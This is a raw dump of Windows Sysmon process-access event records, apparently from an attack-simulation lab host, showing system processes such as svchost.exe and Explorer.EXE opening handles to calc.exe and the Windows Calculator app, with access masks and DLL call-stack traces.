22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362016Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362015Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362014Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362013Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362012Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362011Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362010Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362009Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362008Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362007Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362006Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362005Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362004Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362003Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-337b-6013-8402-000000001100}16568412C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362002Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362001Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362000Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361999Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-337e-6013-9402-000000001100}75849212C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361998Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.522{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361997Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.507{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361996Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.507{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361995Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.507{8e433fbf-2a44-6013-1100-000000001100}11165232C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361994Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 